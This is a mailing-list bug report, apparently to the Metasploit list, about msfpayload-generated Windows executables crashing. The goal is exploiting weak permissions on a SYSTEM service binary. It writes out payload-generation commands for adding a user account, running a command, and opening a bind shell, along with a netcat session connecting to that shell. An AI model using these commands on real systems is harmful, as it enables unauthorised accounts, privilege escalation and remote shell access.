Bugs in msfpayload

[nicob at nicob.net (Nicob)]

Hello !

[=] Bug report :

I recently tried to use msfpayload to exploit some weak ACL on the EXE
used by a SYSTEM service (something like [1]). The following tests were
done on two distincts Windows XP SP2 French, as an unprivilegied user
and as an admin (msfpayload from trunk 5080, running on Linux) :

1) msfpayload windows/adduser USER=toto PASS=titi X >
adduser_toto_titi.exe

When executed : Access violation when reading [C2A353BE]

2) msfpayload windows/exec CMD="cmd /c dir c:\ > c:\out.txt" X >
exec_dir_c.exe

When executed : Access violation when reading [C2A353BE]

3) msfpayload windows/shell/bind_tcp LPORT=31337 X > bind_tcp_31337.exe

When executed, port is binded but the app crashs at the first command
connection :

C:\> nc -vn 127.0.0.1 31337
(UNKNOWN) [127.0.0.1] 31337 (?) open
dir
[ crash : Access violation when writing to [00000004] ]
C:\>

But using the "C" option of msfpayload and inserting it in a small
skeleton (like [2]) is working.

[=] Questions :

1) Is this bug known, am I missing something ?

2) Is it possible to add to the windows/adduser payload an option
allowing to select a given group to which add the user ? Something like
the patch posted by Jerome in May [3].

3) How to use a skeleton like [2] with a two-stages payload like
"msfpayload windows/shell/bind_tcp C" ?

[=] Links :

1:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-cisco-vpn-client-cvpndexe/
2:http://seclists.org/fulldisclosure/2005/Dec/1286.html
3:http://www.metasploit.com/archive/framework/msg02188.html


Regards,
Nicob